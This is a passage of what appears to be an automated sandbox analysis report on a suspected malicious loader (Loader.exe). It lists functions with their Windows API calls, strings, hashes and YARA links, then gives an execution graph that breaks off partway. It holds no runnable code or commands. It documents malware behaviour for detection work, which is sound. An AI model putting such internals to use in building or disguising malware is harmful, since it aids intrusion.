                                                                            • String ID: DuVw$EqLs$N=G?$^9[;$vIyK$w%G'$zMNO
                                                                            • API String ID: 0-2443247208
                                                                            • Opcode ID: 221025fd2dabd3dab3c67fb90afdcac86f00cb25e9f5fe44f49ee22fe928b495
                                                                            • Instruction ID: e6aab0376b136bc08bc164b44470f9732f17d3e914732833e4885affb84ac265
                                                                            • Opcode Fuzzy Hash: 221025fd2dabd3dab3c67fb90afdcac86f00cb25e9f5fe44f49ee22fe928b495
                                                                            • Instruction Fuzzy Hash: B161FDB0250B419BE324CF66D882BD3BBE2BB45344F248D1DC1EA9BB14DB74A049CF94
                                                                            Function 6E4FD091 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 79COMMON
                                                                            Download Yara Rule
                                                                            Strings
                                                                            • C:\Users\user\Desktop\Loader.exe, xrefs: 6E4FD0AD
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.2137733316.000000006E4F1000.00000020.00000001.01000000.00000007.sdmp, Offset: 6E4F0000, based on PE: true
                                                                            • Associated: 00000000.00000002.2137718188.000000006E4F0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2137767384.000000006E504000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2137788755.000000006E50B000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2137884008.000000006E55E000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_6e4f0000_Loader.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID: C:\Users\user\Desktop\Loader.exe
                                                                            • API String ID: 0-2183494786
                                                                            • Opcode ID: 9501121d1448a1960be853ecc58cce8ed9270d7bb57b04d63200cfbfefdcdccf
                                                                            • Instruction ID: 4b27fedffe68e9d257b21f66eb00c313644c6bd676e5be33069d90c8af42857c
                                                                            • Opcode Fuzzy Hash: 9501121d1448a1960be853ecc58cce8ed9270d7bb57b04d63200cfbfefdcdccf
                                                                            • Instruction Fuzzy Hash: 00214C31614205EFD710AEF5CE50F8B77ADABC2B68701492AF9149B250DB71F803CAA0
                                                                            Function 6E4FB09E Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 42libraryloaderCOMMONLIBRARYCODE
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • GetModuleHandleExW.KERNEL32(00000000,mscoree.dll,00000000,126A8649,00000000,?,00000000,6E5039D2,000000FF,?,6E4FB038,?,?,6E4FB00C,?), ref: 6E4FB0D3
                                                                            • GetProcAddress.KERNEL32(00000000,CorExitProcess), ref: 6E4FB0E5
                                                                            • FreeLibrary.KERNEL32(00000000,?,00000000,6E5039D2,000000FF,?,6E4FB038,?,?,6E4FB00C,?), ref: 6E4FB107
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.2137733316.000000006E4F1000.00000020.00000001.01000000.00000007.sdmp, Offset: 6E4F0000, based on PE: true
                                                                            • Associated: 00000000.00000002.2137718188.000000006E4F0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2137767384.000000006E504000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2137788755.000000006E50B000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2137884008.000000006E55E000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_6e4f0000_Loader.jbxd
                                                                            Similarity
                                                                            • API ID: AddressFreeHandleLibraryModuleProc
                                                                            • String ID: CorExitProcess$mscoree.dll
                                                                            • API String ID: 4061214504-1276376045
                                                                            • Opcode ID: 98fef1db769efb75c113699ab1abd083800d8024ac526a93c3e32291f8d9194f
                                                                            • Instruction ID: e9bbe43864b387a364b9c3090caa56ddfdb57909b6ac6bb823403222f038fdd5
                                                                            • Opcode Fuzzy Hash: 98fef1db769efb75c113699ab1abd083800d8024ac526a93c3e32291f8d9194f
                                                                            • Instruction Fuzzy Hash: 6C018631A0496AEFDF119F90CC19FAEBBF9FB45B50F01452AF821A6380DF749901CA90
                                                                            Function 6E4FFB25 Relevance: 7.7, APIs: 5, Instructions: 197COMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • __alloca_probe_16.LIBCMT ref: 6E4FFBAA
                                                                            • __alloca_probe_16.LIBCMT ref: 6E4FFC73
                                                                            • __freea.LIBCMT ref: 6E4FFCDA
                                                                              • Part of subcall function 6E4FECBE: HeapAlloc.KERNEL32(00000000,6E4FD60A,?,?,6E4FD60A,00000220,?,00000000,?), ref: 6E4FECF0
                                                                            • __freea.LIBCMT ref: 6E4FFCED
                                                                            • __freea.LIBCMT ref: 6E4FFCFA
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.2137733316.000000006E4F1000.00000020.00000001.01000000.00000007.sdmp, Offset: 6E4F0000, based on PE: true
                                                                            • Associated: 00000000.00000002.2137718188.000000006E4F0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2137767384.000000006E504000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2137788755.000000006E50B000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2137884008.000000006E55E000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_6e4f0000_Loader.jbxd
                                                                            Similarity
                                                                            • API ID: __freea$__alloca_probe_16$AllocHeap
                                                                            • String ID:
                                                                            • API String ID: 1096550386-0
                                                                            • Opcode ID: 6fe9c788088a42139f3786c438fe27ca2aa3903e3a06af68015e433935739d87
                                                                            • Instruction ID: 8aa224840f98f7b0f4b5da0ad7139a2fb3baa42f8555b4c3fc32058b12454639
                                                                            • Opcode Fuzzy Hash: 6fe9c788088a42139f3786c438fe27ca2aa3903e3a06af68015e433935739d87
                                                                            • Instruction Fuzzy Hash: 10518471501296EFEB118FF58C94EAB76ADEFC4F14B21052ABD14D6240EB70D812C6A0
                                                                            Function 6E525788 Relevance: 7.5, Strings: 6, Instructions: 36COMMON
                                                                            Download Yara Rule
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.2137788755.000000006E50B000.00000004.00000001.01000000.00000007.sdmp, Offset: 6E50B000, based on PE: true
                                                                            • Associated: 00000000.00000002.2137884008.000000006E55E000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_6e4f0000_Loader.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID: C$D$E$G$I$K
                                                                            • API String ID: 0-3170450736
                                                                            • Opcode ID: 71d1cdf6b27191a3ceaccc997da4f88aa1c059b4041b785dbd5d8d52fc0a7042
                                                                            • Instruction ID: 06b95c9b85f16eede0dae6643b274f2d686985713970ae69746dc711415f798c
                                                                            • Opcode Fuzzy Hash: 71d1cdf6b27191a3ceaccc997da4f88aa1c059b4041b785dbd5d8d52fc0a7042
                                                                            • Instruction Fuzzy Hash: 0E11E57450C7C08ED772862894887DABFD06BA7318F184EADD4DC872D2C67A444ACB27
                                                                            Function 6E4F9B12 Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 27libraryCOMMONLIBRARYCODE
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • LoadLibraryExW.KERNEL32(00000000,00000000,00000800,?,6E4F9AC3,00000000,?,00000001,?,?,?,6E4F9BB2,00000001,FlsFree,6E504D60,FlsFree), ref: 6E4F9B1F
                                                                            • GetLastError.KERNEL32(?,6E4F9AC3,00000000,?,00000001,?,?,?,6E4F9BB2,00000001,FlsFree,6E504D60,FlsFree,00000000,?,6E4F9611), ref: 6E4F9B29
                                                                            • LoadLibraryExW.KERNEL32(00000000,00000000,00000000), ref: 6E4F9B51
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.2137733316.000000006E4F1000.00000020.00000001.01000000.00000007.sdmp, Offset: 6E4F0000, based on PE: true
                                                                            • Associated: 00000000.00000002.2137718188.000000006E4F0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2137767384.000000006E504000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2137788755.000000006E50B000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2137884008.000000006E55E000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_6e4f0000_Loader.jbxd
                                                                            Similarity
                                                                            • API ID: LibraryLoad$ErrorLast
                                                                            • String ID: api-ms-
                                                                            • API String ID: 3177248105-2084034818
                                                                            • Opcode ID: e15d234ed5cdfad4bcacf0d4062c736642c099850e04247209c811111e765496
                                                                            • Instruction ID: 5b1ac4b60313b76d5b2cca61ca7bb6d0a2ab0d8928393352a7bfa4030cc318ad
                                                                            • Opcode Fuzzy Hash: e15d234ed5cdfad4bcacf0d4062c736642c099850e04247209c811111e765496
                                                                            • Instruction Fuzzy Hash: FBE01A31244605F7EF501FF0DD05F493BA9AB52F41F104425FB0CB819AEB629A1296D5
                                                                            Function 6E544380 Relevance: 6.4, Strings: 5, Instructions: 196COMMON
                                                                            Download Yara Rule
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.2137788755.000000006E50B000.00000004.00000001.01000000.00000007.sdmp, Offset: 6E50B000, based on PE: true
                                                                            • Associated: 00000000.00000002.2137884008.000000006E55E000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_6e4f0000_Loader.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID: ,$6$J$z${
                                                                            • API String ID: 0-4197712616
                                                                            • Opcode ID: 016fc98dc0c86eb96dda10b9aeb45780d7313213476c5f1c3379279f69da500d
                                                                            • Instruction ID: 6e76dfe5b76d1f0da923405abac9b85cd3577e866e8e09076d70fef77ae4abe7
                                                                            • Opcode Fuzzy Hash: 016fc98dc0c86eb96dda10b9aeb45780d7313213476c5f1c3379279f69da500d
                                                                            • Instruction Fuzzy Hash: E6615772E58165CFCF14CEECC8903EEBBF19B86324F198A29D855A73C1D6749C028791
                                                                            Function 6E500232 Relevance: 6.3, APIs: 4, Instructions: 333fileCOMMONLIBRARYCODE
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • GetConsoleOutputCP.KERNEL32(126A8649,00000000,00000000,?), ref: 6E500295
                                                                              • Part of subcall function 6E4FDC5F: WideCharToMultiByte.KERNEL32(?,00000000,00000000,00000000,?,-00000008,?,00000000,-00000008,-00000008,00000000,?,6E4FFCD0,?,00000000,-00000008), ref: 6E4FDCC0
                                                                            • WriteFile.KERNEL32(?,?,00000000,?,00000000), ref: 6E5004E7
                                                                            • WriteFile.KERNEL32(?,?,00000001,?,00000000), ref: 6E50052D
                                                                            • GetLastError.KERNEL32 ref: 6E5005D0
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.2137733316.000000006E4F1000.00000020.00000001.01000000.00000007.sdmp, Offset: 6E4F0000, based on PE: true
                                                                            • Associated: 00000000.00000002.2137718188.000000006E4F0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2137767384.000000006E504000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2137788755.000000006E50B000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2137884008.000000006E55E000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_6e4f0000_Loader.jbxd
                                                                            Similarity
                                                                            • API ID: FileWrite$ByteCharConsoleErrorLastMultiOutputWide
                                                                            • String ID:
                                                                            • API String ID: 2112829910-0
                                                                            • Opcode ID: 90171369314592f94f876447f5df17bcfb54a09c14d55efddfbe1b74509b4944
                                                                            • Instruction ID: 68bba38d66dc09b1aa170159e25ad7472030b326091e93587a3cd6c5518184d1
                                                                            • Opcode Fuzzy Hash: 90171369314592f94f876447f5df17bcfb54a09c14d55efddfbe1b74509b4944
                                                                            • Instruction Fuzzy Hash: 06D15875D046499FDB11CFE8C880AEEBBF4EF49314F14492AE555EB241EB30A942CF50
                                                                            Function 6E4F9C93 Relevance: 6.2, APIs: 4, Instructions: 168COMMONLIBRARYCODE
                                                                            Download Yara Rule
                                                                            APIs
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.2137733316.000000006E4F1000.00000020.00000001.01000000.00000007.sdmp, Offset: 6E4F0000, based on PE: true
                                                                            • Associated: 00000000.00000002.2137718188.000000006E4F0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2137767384.000000006E504000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2137788755.000000006E50B000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2137884008.000000006E55E000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_6e4f0000_Loader.jbxd
                                                                            Similarity
                                                                            • API ID: AdjustPointer
                                                                            • String ID:
                                                                            • API String ID: 1740715915-0
                                                                            • Opcode ID: cec873d5b1381868c1c905e03f71d272ded6bed0de23f3db8c911c666db4a6ab
                                                                            • Instruction ID: 3f9da88a134d62d737661fac609e160bcedb40dd87cf92534866eb1ba94c0a8f
                                                                            • Opcode Fuzzy Hash: cec873d5b1381868c1c905e03f71d272ded6bed0de23f3db8c911c666db4a6ab
                                                                            • Instruction Fuzzy Hash: 5351ED72501602EFEB468FF5D850FAA73A4EF85B14F204A2FEA1547294E733E842C790
                                                                            Function 6E4FC8AB Relevance: 6.1, APIs: 4, Instructions: 82COMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                              • Part of subcall function 6E4FDC5F: WideCharToMultiByte.KERNEL32(?,00000000,00000000,00000000,?,-00000008,?,00000000,-00000008,-00000008,00000000,?,6E4FFCD0,?,00000000,-00000008), ref: 6E4FDCC0
                                                                            • GetLastError.KERNEL32 ref: 6E4FC90F
                                                                            • __dosmaperr.LIBCMT ref: 6E4FC916
                                                                            • GetLastError.KERNEL32(?,?,?,?), ref: 6E4FC950
                                                                            • __dosmaperr.LIBCMT ref: 6E4FC957
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.2137733316.000000006E4F1000.00000020.00000001.01000000.00000007.sdmp, Offset: 6E4F0000, based on PE: true
                                                                            • Associated: 00000000.00000002.2137718188.000000006E4F0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2137767384.000000006E504000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2137788755.000000006E50B000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2137884008.000000006E55E000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_6e4f0000_Loader.jbxd
                                                                            Similarity
                                                                            • API ID: ErrorLast__dosmaperr$ByteCharMultiWide
                                                                            • String ID:
                                                                            • API String ID: 1913693674-0
                                                                            • Opcode ID: 19235575ad19517273f33fe582822f0113272d130a10dbfc73dd47f4adaa5b55
                                                                            • Instruction ID: acaa48acd7ef0d0a0cc2446c9cdb3b42c290f0efe2937b1b31b955cdbe103926
                                                                            • Opcode Fuzzy Hash: 19235575ad19517273f33fe582822f0113272d130a10dbfc73dd47f4adaa5b55
                                                                            • Instruction Fuzzy Hash: 80217471A04605EFD7109FF68880D5AB7ADEF85B68701492EF925AF640DB30EC039BA4
                                                                            Function 6E4FDD02 Relevance: 6.1, APIs: 4, Instructions: 74COMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • GetEnvironmentStringsW.KERNEL32 ref: 6E4FDD0A
                                                                              • Part of subcall function 6E4FDC5F: WideCharToMultiByte.KERNEL32(?,00000000,00000000,00000000,?,-00000008,?,00000000,-00000008,-00000008,00000000,?,6E4FFCD0,?,00000000,-00000008), ref: 6E4FDCC0
                                                                            • FreeEnvironmentStringsW.KERNEL32(00000000), ref: 6E4FDD42
                                                                            • FreeEnvironmentStringsW.KERNEL32(00000000), ref: 6E4FDD62
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.2137733316.000000006E4F1000.00000020.00000001.01000000.00000007.sdmp, Offset: 6E4F0000, based on PE: true
                                                                            • Associated: 00000000.00000002.2137718188.000000006E4F0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2137767384.000000006E504000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2137788755.000000006E50B000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2137884008.000000006E55E000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_6e4f0000_Loader.jbxd
                                                                            Similarity
                                                                            • API ID: EnvironmentStrings$Free$ByteCharMultiWide
                                                                            • String ID:
                                                                            • API String ID: 158306478-0
                                                                            • Opcode ID: 6850f467619cb11ea3318e395d21a1310c711facc76037249f07ed9dba9bc012
                                                                            • Instruction ID: 497a3dc1c23ccccb2b3699482fe939bfa6bcf933e64d5b14f7368d422c7c0cb6
                                                                            • Opcode Fuzzy Hash: 6850f467619cb11ea3318e395d21a1310c711facc76037249f07ed9dba9bc012
                                                                            • Instruction Fuzzy Hash: 7211D6B1901659FE671117F65CC8EAF29ACDEE6A98701062EF504D6204EFA0CD0389F2
                                                                            Function 6E501BA6 Relevance: 6.0, APIs: 4, Instructions: 29COMMONLIBRARYCODE
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • WriteConsoleW.KERNEL32(00000000,?,00000000,00000000,00000000,?,6E501366,00000000,00000001,00000000,?,?,6E500624,?,00000000,00000000), ref: 6E501BBD
                                                                            • GetLastError.KERNEL32(?,6E501366,00000000,00000001,00000000,?,?,6E500624,?,00000000,00000000,?,?,?,6E500BC7,00000000), ref: 6E501BC9
                                                                              • Part of subcall function 6E501B8F: CloseHandle.KERNEL32(FFFFFFFE,6E501BD9,?,6E501366,00000000,00000001,00000000,?,?,6E500624,?,00000000,00000000,?,?), ref: 6E501B9F
                                                                            • ___initconout.LIBCMT ref: 6E501BD9
                                                                              • Part of subcall function 6E501B51: CreateFileW.KERNEL32(CONOUT$,40000000,00000003,00000000,00000003,00000000,00000000,6E501B80,6E501353,?,?,6E500624,?,00000000,00000000,?), ref: 6E501B64
                                                                            • WriteConsoleW.KERNEL32(00000000,?,00000000,00000000,?,6E501366,00000000,00000001,00000000,?,?,6E500624,?,00000000,00000000,?), ref: 6E501BEE
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.2137733316.000000006E4F1000.00000020.00000001.01000000.00000007.sdmp, Offset: 6E4F0000, based on PE: true
                                                                            • Associated: 00000000.00000002.2137718188.000000006E4F0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2137767384.000000006E504000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2137788755.000000006E50B000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2137884008.000000006E55E000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_6e4f0000_Loader.jbxd
                                                                            Similarity
                                                                            • API ID: ConsoleWrite$CloseCreateErrorFileHandleLast___initconout
                                                                            • String ID:
                                                                            • API String ID: 2744216297-0
                                                                            • Opcode ID: e6373729694fa8336e1844fb9a8539a3f07d9be6df108678cbcb5512349f9b45
                                                                            • Instruction ID: 89a0af11885e57516d7e8baa8266a2c254debb8e6f7baa812c6ad1765911be19
                                                                            • Opcode Fuzzy Hash: e6373729694fa8336e1844fb9a8539a3f07d9be6df108678cbcb5512349f9b45
                                                                            • Instruction Fuzzy Hash: 9CF03036000518BBCF121FD5CD04AAA3FA6FB493B4F014018FF1896120EB328D60DB92
                                                                            Function 6E500AE5 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 196fileCOMMONLIBRARYCODE
                                                                            Download Yara Rule
                                                                            APIs
                                                                              • Part of subcall function 6E500232: GetConsoleOutputCP.KERNEL32(126A8649,00000000,00000000,?), ref: 6E500295
                                                                            • WriteFile.KERNEL32(?,?,00000000,?,00000000,?,00000000,00000000,00000000,?,?,00000000,?,?,6E4FEB45,?), ref: 6E500C6A
                                                                            • GetLastError.KERNEL32(?,6E4FEB45,?,6E4FE9D8,00000000,?,00000000,6E4FE9D8,?,00000000,00000000,6E5098C0,0000002C,6E4FEA49,?), ref: 6E500C74
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.2137733316.000000006E4F1000.00000020.00000001.01000000.00000007.sdmp, Offset: 6E4F0000, based on PE: true
                                                                            • Associated: 00000000.00000002.2137718188.000000006E4F0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2137767384.000000006E504000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2137788755.000000006E50B000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2137884008.000000006E55E000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_6e4f0000_Loader.jbxd
                                                                            Similarity
                                                                            • API ID: ConsoleErrorFileLastOutputWrite
                                                                            • String ID: EOn
                                                                            • API String ID: 2915228174-296699496
                                                                            • Opcode ID: 57e943814d89594a7033c3b5b0e5022fc28f09d1141d172ce743639bce718f48
                                                                            • Instruction ID: 18a5642bcb903e3468361113ccddbd98741ceea12eb41b04758803ffdc89a900
                                                                            • Opcode Fuzzy Hash: 57e943814d89594a7033c3b5b0e5022fc28f09d1141d172ce743639bce718f48
                                                                            • Instruction Fuzzy Hash: 4E619F7190411AAFDF41CFE8C894AEEBBF9BF49308F14494AFA14A7245E771DA01CB51
                                                                            Function 6E4FA28F Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 112COMMONLIBRARYCODE
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • EncodePointer.KERNEL32(00000000,?), ref: 6E4FA2B4
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.2137733316.000000006E4F1000.00000020.00000001.01000000.00000007.sdmp, Offset: 6E4F0000, based on PE: true
                                                                            • Associated: 00000000.00000002.2137718188.000000006E4F0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2137767384.000000006E504000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2137788755.000000006E50B000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2137884008.000000006E55E000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_6e4f0000_Loader.jbxd
                                                                            Similarity
                                                                            • API ID: EncodePointer
                                                                            • String ID: MOC$RCC
                                                                            • API String ID: 2118026453-2084237596
                                                                            • Opcode ID: 4d5fa19e073e14d87c163d865274b25a40b969224484ab5270f6fe4e28c3099e
                                                                            • Instruction ID: 2b3a0795f92322692b284590c45bf0ef8246259f857ad1568c5151d6f0f315b7
                                                                            • Opcode Fuzzy Hash: 4d5fa19e073e14d87c163d865274b25a40b969224484ab5270f6fe4e28c3099e
                                                                            • Instruction Fuzzy Hash: FF418A75A00209EFDF05CFE4C880EEE7BB9FF88704F15805AF90466214D7369952EB91
                                                                            Function 6E548B80 Relevance: 5.2, Strings: 4, Instructions: 237COMMON
                                                                            Download Yara Rule
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.2137788755.000000006E50B000.00000004.00000001.01000000.00000007.sdmp, Offset: 6E50B000, based on PE: true
                                                                            • Associated: 00000000.00000002.2137884008.000000006E55E000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_6e4f0000_Loader.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID: 0$<?=1$<?=1$p
                                                                            • API String ID: 0-3549820269
                                                                            • Opcode ID: 822ad0e8d94173505580cfe7d1f54461285590f5db0f7c6a09e2a8107b563427
                                                                            • Instruction ID: 963316f1b0388689a1b9a40a69be48f5a5bc87dbdb5a711a5284fd5fb7bedec0
                                                                            • Opcode Fuzzy Hash: 822ad0e8d94173505580cfe7d1f54461285590f5db0f7c6a09e2a8107b563427
                                                                            • Instruction Fuzzy Hash: A07198B5609301DFE714DF58C8A0B6BBBE6EBC9304F10881CE9958B390C776E845CB92
                                                                            Function 6E523AEE Relevance: 5.1, Strings: 4, Instructions: 76COMMON
                                                                            Download Yara Rule
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.2137788755.000000006E50B000.00000004.00000001.01000000.00000007.sdmp, Offset: 6E50B000, based on PE: true
                                                                            • Associated: 00000000.00000002.2137884008.000000006E55E000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_6e4f0000_Loader.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID: 4$5$:$;
                                                                            • API String ID: 0-1928560196
                                                                            • Opcode ID: d153f77c8721b22faaf95cadedc20aab23add219191523cad3ecf1d766cdaf85
                                                                            • Instruction ID: 5872c7ef678b1f2ae641e915df1441d0cede4145837c0e98e5c7eba77e510031
                                                                            • Opcode Fuzzy Hash: d153f77c8721b22faaf95cadedc20aab23add219191523cad3ecf1d766cdaf85
                                                                            • Instruction Fuzzy Hash: 9231AF3664D3828FD324CAA8C88479ABBE1ABC5314F19892ED5D85B3C2C6759841CB12
                                                                            Function 6E525593 Relevance: 5.1, Strings: 4, Instructions: 75COMMON
                                                                            Download Yara Rule
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.2137788755.000000006E50B000.00000004.00000001.01000000.00000007.sdmp, Offset: 6E50B000, based on PE: true
                                                                            • Associated: 00000000.00000002.2137884008.000000006E55E000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_6e4f0000_Loader.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID: 4$5$:$;
                                                                            • API String ID: 0-1928560196
                                                                            • Opcode ID: 6116ab6c56a5ca4c68f96decbec347a9299d2bb6600b90c1d668b41a6306a8d2
                                                                            • Instruction ID: fee3e4609beb734bce99acafa89ea6e0af7acdaafaa53e0d0f9879c3f3f10755
                                                                            • Opcode Fuzzy Hash: 6116ab6c56a5ca4c68f96decbec347a9299d2bb6600b90c1d668b41a6306a8d2
                                                                            • Instruction Fuzzy Hash: 0531B07560D3C08FD360CA28C98479ABBE2ABD2354F188D7ED4C957395CB74A845CB03

                                                                            Execution Graph

                                                                            Execution Coverage:8.5%
                                                                            Dynamic/Decrypted Code Coverage:100%
                                                                            Signature Coverage:12%
                                                                            Total number of Nodes:200
                                                                            Total number of Limit Nodes:14
                                                                            execution_graph 15921 33ca97e 15922 33ca9a0 15921->15922 15922->15922 15923 33ca9e0 SysAllocString 15922->15923 15924 33caa50 15923->15924 15924->15924 15925 33caa7d SysAllocString 15924->15925 15926 33caa9e 15925->15926 15927 33cadfd SysFreeString SysFreeString 15926->15927 15928 33cac73 15926->15928 15929 33caaee VariantInit 15926->15929 15930 33cadd9 SysFreeString 15926->15930 15931 33cae0d SysFreeString SysFreeString 15926->15931 15932 33cac8a VariantClear 15926->15932 15933 33cacb2 15926->15933 15937 33cac9f 15926->15937 15942 33cab40 15926->15942 15927->15931 15928->15932 15929->15942 15941 33cadf8 15930->15941 15931->15937 15932->15937 15933->15937 15938 33cb0fe 15933->15938 15939 33cb145 15933->15939 15949 33cae68 15933->15949 15936 33d3da0 LdrInitializeThunk 15940 33cb15b 15936->15940 15967 33d3da0 15938->15967 15939->15936 15941->15927 15942->15927 15942->15928 15942->15930 15942->15931 15942->15932 15942->15933 15942->15937 15943 33caef4 15955 33ce230 15943->15955 15944 33caf01 15945 33caff2 15963 33cdc40 15945->15963 15948 33ce140 LdrInitializeThunk 15948->15949 15949->15943 15949->15944 15949->15945 15949->15948 15951 33cdfb0 15949->15951 15952 33ce0ae 15951->15952 15953 33cdfc2 15951->15953 15952->15949 15953->15952 15971 33d0d90 LdrInitializeThunk 15953->15971 15956 33ce307 15955->15956 15957 33ce24a 15955->15957 15956->15944 15957->15956 15960 33ce302 15957->15960 15972 33d0d90 LdrInitializeThunk 15957->15972 15961 33ce48e 15960->15961 15973 33d0d90 LdrInitializeThunk 15960->15973 15961->15956 15974 33ce140 15961->15974 15964 33cdc58 RtlFreeHeap 15963->15964 15965 33cdcd3 15963->15965 15964->15965 15965->15937 15969 33d3db0 15967->15969 15968 33d3eee 15968->15939 15969->15968 15979 33d0d90 LdrInitializeThunk 15969->15979 15971->15952 15972->15960 15973->15961 15975 